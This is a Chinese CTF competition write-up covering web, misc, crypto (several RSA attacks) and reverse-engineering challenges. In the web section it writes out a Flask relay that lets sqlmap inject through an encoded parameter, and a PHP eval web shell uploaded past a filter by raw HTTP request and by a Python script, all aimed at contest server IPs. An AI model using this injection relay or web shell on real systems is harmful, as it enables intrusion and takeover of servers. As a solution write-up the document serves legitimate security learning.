文章目錄
- 前言
- Web
- base
- Misc
- 拼圖
- Very very easy hex
- Flag不在這
- 牛年大吉
- Love_it!
- 網路深處
- YLBNB
- Crypto
- easy easy rsa
- GAP
- Hard RSA
- Easy_RSA
- Re
- Very easy Reverse
前言
渾水摸魚拿了個第一
Web
base
首先進去發現http://10xxx01/?user=QgcAYAbgbw,后面引數不對勁,嘗試base全家桶操作失敗,之后經過一番嘗試發現每兩個一位翻譯成了字符,又看到robots.txt
User-agent: *
Disallow: /base.txt
繼續訪問得到編碼,為了后面方便決定把他組合成一個字典
import requests
res="{"
with open("1.txt", 'r') as f:
a = f.readlines()
for i in a:
tmp = i.strip("\n")
url = 'http://106.55.249.213:5001/?user='+tmp
# print(url)
r = requests.get(url)
z = r.text[32:]
if z!='':
k = f'"{z}":"{tmp}",'
res += k
res=res[:-1]
res+="}"
print(res)
得到了admin是XAXwaAZAaQ
之后url一個跳轉到了http://106.55.249.213:5001/?user=XAXwaAZAaQ&id=xx猜到是sql注入,手注無果決定上sqlmap,不是很想寫tamper,于是簡單用flask實作中轉注入
import requests
from flask import Flask,request
app = Flask(__name__)
a = {" ": "CA", "!": "HA", "": "HQ", "#": "Hg", "$": "Hw", "%": "IA", "&": "IQ", "'": "Ig", "(": "Iw", ")": "JA",
"*": "JQ", "+": "Jg", ",": "Jw", "-": "KA", ".": "KQ", "/": "Kg", "0": "Kw", "1": "LA", "2": "LQ", "3": "Lg",
"4": "Lw", "5": "MA", "6": "MQ", "7": "Mg", "8": "Mw", "9": "NA", ":": "NQ", ";": "Ng", "<": "Nw", "=": "OA",
">": "OQ", "?": "Og", "@": "Ow", "A": "PA", "B": "PQ", "C": "Pg", "D": "Pw", "E": "QA", "F": "QQ", "G": "Qg",
"H": "Qw", "I": "RA", "J": "RQ", "K": "Rg", "L": "Rw", "M": "SA", "N": "SQ", "O": "Sg", "P": "Sw", "Q": "TA",
"R": "TQ", "S": "Tg", "T": "Tw", "U": "UA", "V": "UQ", "W": "Ug", "X": "Uw", "Y": "VA", "Z": "VQ", "[": "Vg",
"\\": "Vw", "]": "WA", "^": "WQ", "_": "Wg", "`": "Ww", "a": "XA", "b": "XQ", "c": "Xg", "d": "Xw", "e": "YA",
"f": "YQ", "g": "Yg", "h": "Yw", "i": "ZA", "j": "ZQ", "k": "Zg", "l": "Zw", "m": "aA", "n": "aQ", "o": "ag",
"p": "aw", "q": "bA", "r": "bQ", "s": "bg", "t": "bw", "u": "cA", "v": "cQ", "w": "cg", "x": "cw", "y": "dA",
"z": "dQ", "{": "dg", "|": "dw", "}": "eA", "~": "eQ", "": "eg", "聙": "ew", "聛": "fA", "聜": "fQ", "聝": "fg",
"聞": "fw", "聟": "gA", "聠": "gQ", "聡": "gg", "聢": "gw", "聣": "hA", "聤": "hQ", "聥": "hg", "聦": "hw", "聧": "iA",
"聨": "iQ", "聫": "ig", "聬": "iw", "聭": "jA", "聮": "jQ", "聯": "jg", "聰": "jw", "聲": "kA", "聳": "kQ", "聴": "kg",
"聵": "kw", "聶": "lA", "職": "lQ", "聸": "lg", "聹": "lw", "聺": "mA", "聻": "mQ", "聼": "mg", "聽": "mw", "隆": "nA",
"壟": "nQ", "攏": "ng", "隴": "nw", "樓": "oA", "婁": "oQ", "摟": "og", "簍": "ow", "漏": "pA", "陋": "pQ", "蘆": "pg",
"盧": "pw", "顱": "qA", "廬": "qQ", "爐": "qg", "擄": "qw", "鹵": "rA", "虜": "rQ", "魯": "rg", "麓": "rw", "碌": "sA",
"露": "sQ", "路": "sg", "賂": "sw", "鹿": "tA", "潞": "tQ", "祿": "tg", "錄": "tw", "陸": "uA", "戮": "uQ", "驢": "ug",
"脌": "uw", "脕": "vA", "脗": "vQ", "脙": "vg", "脛": "vw", "脜": "wA", "脝": "wQ", "脟": "wg", "脠": "ww", "脡": "xA",
"脢": "xQ", "脣": "xg", "脤": "xw", "脥": "yA", "脦": "yQ", "脧": "yg", "脨": "yw", "脩": "zA", "脪": "zQ", "脫": "zg",
"脭": "zw", "脮": "0A", "脰": "0Q", "脳": "0g", "脴": "0w", "脵": "1A", "脷": "1Q", "脹": "1g", "脺": "1w", "脻": "2A",
"脼": "2Q", "脽": "2g", "脿": "2w", "謾": "3A", "芒": "3Q", "茫": "3g", "盲": "3w", "氓": "4A", "忙": "4Q", "莽": "4g",
"貓": "4w", "茅": "5A", "錨": "5Q", "毛": "5g", "矛": "5w", "鉚": "6A", "卯": "6Q", "茂": "6g", "冒": "6w", "帽": "7A",
"貌": "7Q", "貿": "7g", "么": "7w", "玫": "8A", "枚": "8Q", "梅": "8g", "酶": "8w", "霉": "9A", "煤": "9Q", "沒": "9g",
"眉": "9w", "眉": "9w", "眉": "9w", "眉": "9w", "眉": "9w", "眉": "9w", "眉": "9w", "眉": "9w", "眉": "9w"}
def encode(s):
s=str(s)
res = ''
for i in s:
res += a[i]
return res
@app.route('/')
def hello_world():
id=encode(request.args.get('id'))
url='http://106.55.249.213:5001/?user=XAXwaAZAaQ&id='+id
return requests.get(url=url).text
app.run()
之后
sqlmap.py -u http://127.0.0.1:5000?id=1
后面就是sqlmap常規操作,依次得到資料庫base,資料表flag_sxc,以及欄位flag
首先題目原始碼下載下來,因為是微信嘛后綴肯定是.wxapkg后綴,之后利用工具:wxappUnpacker解包得到了一堆源檔案,第一步搜索flag,發現沒有什么價值,之后審計代碼在notes.js發現了檔案上傳利用點
upImgs: function(a, e) {
var t = this;
wx.uploadFile({
url: "http://121.37.189.111:8055/upload_file.php",
filePath: a,
name: "file",
header: {
"content-type": "multipart/form-data"
},
formData: null,
success: function(a) {
console.log(a);
var e = JSON.parse(a.data);
t.data.picPaths.push(e.msg), t.setData({
picPaths: t.data.picPaths
}), console.log(t.data.picPaths);
}
});
}
構造表單上傳,發現過濾了<?只能利用script短標簽繞過,用burp發包
POST /upload_file.php HTTP/1.1
Host: 121.37.189.111:8055
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 187
Content-Type: multipart/form-data; boundary=14360e41c12da1aedb212fc6714a57f7
--14360e41c12da1aedb212fc6714a57f7
Content-Disposition: form-data; name="file"; filename="php"
<script language='php'>eval($_POST[1]);</script>
--14360e41c12da1aedb212fc6714a57f7--
或者python
import requests
r = requests.post("http://121.37.189.111:8055/upload_file.php",files = { 'file':open("1.php") } )
print(r.text)
1.php
<script language='php'>eval($_POST[1]);</script>
之后利用蟻劍連接打開web目錄下flag.php即可
Misc
拼圖
拿到拼圖后,根據描述,鬼刀公主,百度一個1920*1200的原圖,然后直接腳本梭
import cv2
from PIL import Image
import numpy as np
import os
import shutil
import threading
from tqdm import tqdm
dirpath = r'path'
dirs_path = dirpath + r"\output"
source = cv2.imread(dirpath + r"\demo.jpg")
target = Image.fromarray(np.zeros(source.shape, np.uint8))
mkdirlambda = lambda x: os.makedirs(x) if not os.path.exists(x) else True
mkdirlambda(dirpath+"\difference")
dst_path = dirpath + r"\difference"
def match(temp_file):
template = cv2.imread(temp_file)
theight, twidth = template.shape[:2]
result = cv2.matchTemplate(source, template, cv2.TM_SQDIFF_NORMED)
cv2.normalize(result, result, 0, 1, cv2.NORM_MINMAX, -1)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)
target.paste(Image.fromarray(template), min_loc)
return abs(min_val)
class MThread(threading.Thread):
def __init__(self, file_name):
threading.Thread.__init__(self)
self.file_name = file_name
def run(self):
real_path = os.path.join(dirs_path, k)
rect = match(real_path)
if rect > 1e-10:
#print(rect)
shutil.copy(real_path, dst_path)
dirs = os.listdir(dirs_path)
threads = []
for k in tqdm(dirs):
if k.endswith('png'):
mt = MThread(k)
mt.start()
threads.append(mt)
else:
continue
for t in threads:
t.join()
target.show()
target.save(dirpath+r"\flag.jpg")
得到flag
Very very easy hex
拿到3203zip,發現是套娃解壓縮包
import zipfile
import os
n = 3203
for i in range(n, 0, -1):
zip = zipfile.ZipFile('path'+str(i) + '.zip')
if os.path.exists('path'+str(i + 1) + '.zip'):
os.remove('path'+str(i + 1) + '.zip')
li = zip.namelist()
zip.printdir()
zip.extract(li[0], 'path')
之后拿到img壓縮包,解壓得到168張png,觀察hex發現,僅存在04083A00和012040D0兩種格式且0,0處的rgb值也為純黑或純白,轉換成01得到01100110 01101100對應二進制的f和l,進一步
from PIL import Image
binstr=''
for i in range(168):
img=Image.open(str(i)+'.png')
char=img.getpixel((0,0))
if char==(0, 0, 0, 255):
binstr+='0'
else:
binstr+='1'
if len(binstr)>=8:
print(chr(int(binstr,2)),end='')
binstr=''
得到flag
Flag不在這
docx檔案,本質是zip,后綴改成zip之后得到flag.txt
flag{It's_real_easy!D0_Y0u_Like_it?}
牛年大吉
下載下來的圖片來到屬性界面,嘗試flag{這個就是哦!}發現提交成功,
flag{這個就是哦!}
Love_it!
題目說是有傳馬,那就篩選http進行分析,發現了登錄的爆破,那dede應該就是后臺名
flag{dede_后臺賬號_密碼_木馬名_木馬密碼_第三條執行命令}
找到最后一個訪問登錄界面的資料包知道后臺賬號admin密碼starsnowniubi
flag{dede_admin_starsnowniubi_木馬名_木馬密碼_第三條執行命令}
再往下找,發現了上傳的木馬ma.php,找到第三條資料包,密碼是yingzi,執行的命令echo whoami;
flag{dede_admin_starsnowniubi_ma_yingzi_echo `whoami`;}
網路深處
根據提示,先去獲得撥號音,在線網站http://dialabc.com/sound/detect/index.html
15975384265解壓壓縮包
根據錄音的頻譜圖提示tupper
找到在線工具https://tuppers-formula.ovh/
[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-WUw0UZIq-1612917516170)(https://s3.ax1x.com/2021/02/09/ydWX5V.md.png)]
得到flag
YLBNB
追蹤一下TCP,發現xor.py,繼續翻,拿到pyc檔案,反編譯一哈,拿到key,繼續翻,看到一個zip,不想手動分離就直接foremost分,得到YLBSB.xor,根據前面的py寫一個exp
import base64
key="YLBSB?YLBNB!"
file = open("YLBSB.docx", "wb")
enc = open("YLBSB.xor", "rb")
count = 0
cipher = enc.read()
for c in cipher:
d = chr(c ^ ord(key[count % len(key)]))
file.write(d.encode())
count = count + 1
enc.close()
file.close()
file = open("YLBSB.docx", "rb")
plain = base64.b64decode(file.read())
file.close
file = open("YLBSB.docx", "wb")
file.write(plain)
file.close()
拿到docx后,翻到最下面,發現有不可見但是劃線的部分,選中換成黑色顯示flag
[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-cJKvw1w1-1612917516170)(https://s3.ax1x.com/2021/02/09/ydhrmd.png)]
Crypto
easy easy rsa
對n1n2用gcd求p,后面常規思路
import gmpy2
import binascii
n1=12825100771257456077149964910605574628379912849150485275974020467902117235464130742121032530579724237866564791769251587583725631441489760720100057002948256344359458323465989937328959412299485905695960531657748731414339028199922429650835662666221800190685881209740102840495258149699357507420871994133381553002962266178100932214532054094696463627129336711033963381097413539659886146489405551742843204180033734977810683480542088934851102406520152543021307892757619684557961750000731528948222632469628321045924617868708870938946037379106714397519120005629351078109442687651029509686361054127744053158563626266699075075737
n2=12106667820155092651005980788681668939257714995685173260910711516508690589738399069362876916118479326569560356438772026406627666696459488677154928623481898279221763592991189674063719945636491539578401643457393148592966590912378623321315886510941581133207379498943442783133771909578755977685155060485627632310832382151388077346940192798438100540619466956848168872919742741008418429745589887364045046983841365071962255428055166475284027313634844775738922659401945163832045277387473402653688033772789419513303256030578783069827187965792213613558772834195874813704269442102682045669656446050452299378335318477524181485253
c2=4187980246417055670109574209914134920842728879790147759053902195578524923822173623172504926464305172283619697197398385414680370395194257777668782418463576167818360563481718399499794914649713155302730381449258353312689298898026896213681503805901805909523952463970468637528661785771438841120982593452996933730855072663395182215907870741391439468194834658733873078721153024127449124531077916463035731488854158195299285917169793645551008696190001511145682916315612709150405070977837592215815804308397385122772576945987613305629823072933891171331820743633516172878649931249873828674844504731893379037578087987573081245859
e = 65537
p=gmpy2.gcd(n1,n2)
q=n2//p
phi = (p-1)*(q-1)
d = gmpy2.invert(e,phi)
m = pow(c2,d,n2)
print(m)
print(bytes.fromhex(hex(m)[2:]))
GAP
以f分隔后, 發現前幾位是57 5e 52 56,flag的hex是66 6c 61 67,猜測有對應關系,經嘗試發現是異或關系,flag分別跟49 50 51 49異或,且有Key = “12312”,故是分別異或49 50 51 49 50回圈
Ciphertext = "57f5ef52f56f49f0f53f2f50f3f50f3f52f10f6df68f2f46f6ef76f58f56f6cf50f6df76f2f3f55f6df76f5df51f4c".split('f')
# Ciphertext 57 5e 52 56
# flag 66 6c 61 67
for n,i in enumerate(Ciphertext):
if n%5==0:
num=49
elif n%5==1:
num=50
elif n%5==2:
num=51
elif n%5==3:
num=49
else:
num=50
char=chr(int(i,16)^num)
print(char,end='')
得到
flag{1a1a1a1a!_Y0u_Did_a_G00d_Gob}
Hard RSA
先直接開根號得到e1e2,再共模攻擊拿到p就行了
import gmpy2
e1=int(pow(281487861809153,1/3))+1
e2=int(pow(49947026556362417,1/3))+1
n2 = 18724308600993680772040132476147443059937062865510694686877532603079614680086774925762072671394784787691065784432778464228230479469525602116950506124178922966302228834351364607333986401435253287986565305219407269279319145851605536263946222693062150972421981977212241191765587924831341467136660852112059970632881164690431105960074159318822853545203221878413076459098980779367764115932851271974512575031047448816911420663521305894273613218483567916755598148798190932027939210902403155767487515702073721374684377875350047635848757189883075996002319631998930528597791545501045272097478778892159675588840857142652895265911
c2 = [3227115480108687251143827858010802848948769835037303555920483802259214819344453925631294417806432714176524195861938002549436386343852098195596387592472144546437874859798830812267011643855867112448231876484774166379425286268881326798711769931848606930434512049291154720821129654830620829493843059059835800242333615312846190103494997079811557982251508839708002883778910917631553992619052626191828854730582898255670700858011426887487070944722267353577011178466697504947762804170585435684678698950363434075952461947607646966414518037049739527149945887998812316417005423702083018805606242882095334884780205891592816168103, 17139275485259110169718125211934888629708949924849742315041043571562307752055065297519271353044041441264892639110696891866965260187916302606640599942290472419225004160983308212078726494659784938191829066322525193057563553826485587827351089778042018829577434276292639964092632076137550347805354953807458891741631731341557365791973551073866525939105337652370251223107187937345980460911362790708353134912495192276504731259631723322913019046682545871283275754931576128656069033856416078373511440449107627433371949378696710812496517227289219196266427370667273925986284754478473526404645897976394395240810054198847661134728]
gcd, s, t = gmpy2.gcdext(e1, e2)
if s < 0:
s = -s
c2[0] = gmpy2.invert(c2[0], n2)
if t < 0:
t = -t
c2[1] = gmpy2.invert(c2[1], n2)
p = gmpy2.powmod(c2[0], s, n2) * gmpy2.powmod(c2[1], t, n2) % n2
n = 17963064878219297499926539755529525701375912229028373100173473134607394789664287607368340798794683194437682952690508928886652995386383146889003406172408614571972729531812623495934448286040540097840662578369651592616783708165933036306017892497833364373485432426417809013633924450913331047907013191887482793788688736422653892662900369700701081539738763728230752094073294005560908179016172875213907812943500460207818071050071895019325622709305548027158608131204996083137774696224909740835744016252811508782404134677682054379270633099277445509293373814980267901088167711756798567438727515561927878122737404945310578048219
q=n//p
c1=2519784075571363990355801446319896012899269885206109823774950526790963683990153738128746190638393784786596405506731840240589533349004496866914346264165223649729391271273556253486062775839454219993404367212857109756953767455690796208791355456292865648813147954137342631589248190059107210837405220320124078796283385382994717993598412926549647978190991179177838292156516142496656655553613583148209957002024913648233539568864514049304210818483385640653620994626277688420873819215255064048179977060710057344959786809400706849894340484144098989681668420576351191631435372353088813222856086210998354107613629733847782962190
phi = (p-1)*(q-1)
d = gmpy2.invert(e1, phi)
m = pow(c1, d, n)
print(m)
print(bytes.fromhex(hex(m)[2:]))
Easy_RSA
原始碼如下
from libnum import *
from Crypto.Util.number import *
e=16
p=getPrime(1024)
q=getPrime(2014)
m=open("flag.txt","r")
m=m.read()
phi=(p-1)*(q-1)
e=16
n=p*q
c=pow(m,e,n)
print(p,q)
print(c)
#179339724246229843726779086497758086700767091942823382102884697671804799304652009167355556601254668595454468719362996895223198577570604382893112170906563827541309282210572274232294619880050319161575088535959209840362236242388298589816970890276440396102003032194498931444904045321511867770510618482963253444171 129452010891691830141409340110903415892699564803510819611230128697000018597328039023549940695442548949477197670554474296663476556526956844201703892277849111159918130079993188297874083230421826432704150193965881475251551569007803579575294635406881373500519242104699767331003255332253689242203833528581342849543
#2808687352764477098395390294961819217315835766406235505320171029927556669353148216977881915171651466299509767224192462948015834874984486165348031860747483578335393807164134429328527196534260381656710151946245376450723534200936105517142950677477408381688538476698011647690160341234578738276252465419868981865480237722922378366606827835972506973590707313723621953535237744085453112422520046215491391634375583932984581117857542239086424415712847637926466842915619897955952838264553358372055862162937724305897337642251117481658246011399468928899099485021249046029674378841452856157322899643045650367542092683227867005292
e和phi不互素且他們的gcd=4,4=2*2,e/gcd=4,故先用AMM演算法求兩次二次方根,再對求得的m開四次方根
這里直接照搬vincent大佬的腳本再略作修改
def crt(r, m):
from functools import reduce
from Crypto.Util.number import inverse
from operator import mul
assert len(r) == len(m)
M = reduce(lambda x, y: x * y, m)
# M = [M//mi for mi in m]
t = [inverse(M // x, x) * (M // x) for x in m]
res = sum(map(mul, r, t)) % M
return res
# 求解x^e = c mod p^order
def nthRoot_amm(c, e, p, order=1):
from gmpy2 import is_prime
from Crypto.Util.number import getRandomRange, inverse, GCD
assert is_prime(p) and is_prime(e) and (p - 1) % e == 0
cp = c % p ** order if c > p ** order else c
phi = (p - 1) * p ** (order - 1)
mod = p ** order
for i in range(9999):
rho = getRandomRange(1, mod)
if pow(rho, phi // e, mod) != 1:
# print(f'i = {i}')
break
s = phi
t = 0
while s % e == 0:
s //= e
t += 1
assert GCD(s, e) == 1
# print(f't = {t} ')
alpha = inverse(e, s)
a = pow(rho, s * e ** (t - 1), mod)
b = pow(cp, e * alpha - 1, mod)
c = pow(rho, s, mod)
h = 1
for i in range(1, t):
d = pow(b, e ** (t - 1 - i), mod)
if d == 1:
j = 0
else:
j = e - next(filter(lambda x: pow(a, x, mod) == d, range(e)))
b = b * pow(c, e * j, mod) % mod
h = h * pow(c, j, mod) % mod
c = pow(c, e, mod)
root = pow(cp, alpha, mod) * h % mod
# 找到其它根
from gmpy2 import next_prime
all_roots = set()
all_roots.add(root)
g = 3
while len(all_roots) < e:
newRoot = root
g = int(next_prime(g))
u = pow(g, phi // e, mod)
for i in range(e - 1):
newRoot = (newRoot * u) % mod
all_roots.add(newRoot)
return list(all_roots)
def exp():
from Crypto.Util.number import GCD, long_to_bytes
from itertools import product
from gmpy2 import iroot
e = 16
p = 179339724246229843726779086497758086700767091942823382102884697671804799304652009167355556601254668595454468719362996895223198577570604382893112170906563827541309282210572274232294619880050319161575088535959209840362236242388298589816970890276440396102003032194498931444904045321511867770510618482963253444171
q = 129452010891691830141409340110903415892699564803510819611230128697000018597328039023549940695442548949477197670554474296663476556526956844201703892277849111159918130079993188297874083230421826432704150193965881475251551569007803579575294635406881373500519242104699767331003255332253689242203833528581342849543
c = 2808687352764477098395390294961819217315835766406235505320171029927556669353148216977881915171651466299509767224192462948015834874984486165348031860747483578335393807164134429328527196534260381656710151946245376450723534200936105517142950677477408381688538476698011647690160341234578738276252465419868981865480237722922378366606827835972506973590707313723621953535237744085453112422520046215491391634375583932984581117857542239086424415712847637926466842915619897955952838264553358372055862162937724305897337642251117481658246011399468928899099485021249046029674378841452856157322899643045650367542092683227867005292
n=p*q
print('gcd(e,p-1)', GCD(e, p - 1))
print('gcd(e,q-1)', GCD(e, q - 1))
e1 = 2
cp1 = nthRoot_amm(c, e1, p)
cq1 = nthRoot_amm(c, e1, q)
mp = []
mq = []
for cpp in cp1:
mp.extend(nthRoot_amm(cpp, 2, p))
for cqq in cq1:
mq.extend(nthRoot_amm(cqq, 2, q))
for m1, m2 in product(mp, mq):
m = crt([m1, m2], [p, q])
m=iroot(m,4)
if m[1]==True:
flag = long_to_bytes(m[0])
# if b'flag' in flag:
print(flag)
# break
if __name__ == '__main__':
exp()
得到flag
flag{Y0u_D1D_1t!_7h4_R4bin?}
Re
Very easy Reverse
github下載工具pyinstxtractor
利用python pyinstxtractor.py pygame.exe得到逆向后的檔案,將檔案中”5”的后綴改為.pyc,加上pyc檔案頭,再用uncompyle6反編譯pyc檔案,
直接就拿到了flag
轉載請註明出處,本文鏈接:https://www.uj5u.com/ruanti/258769.html
標籤:其他
上一篇:單調堆疊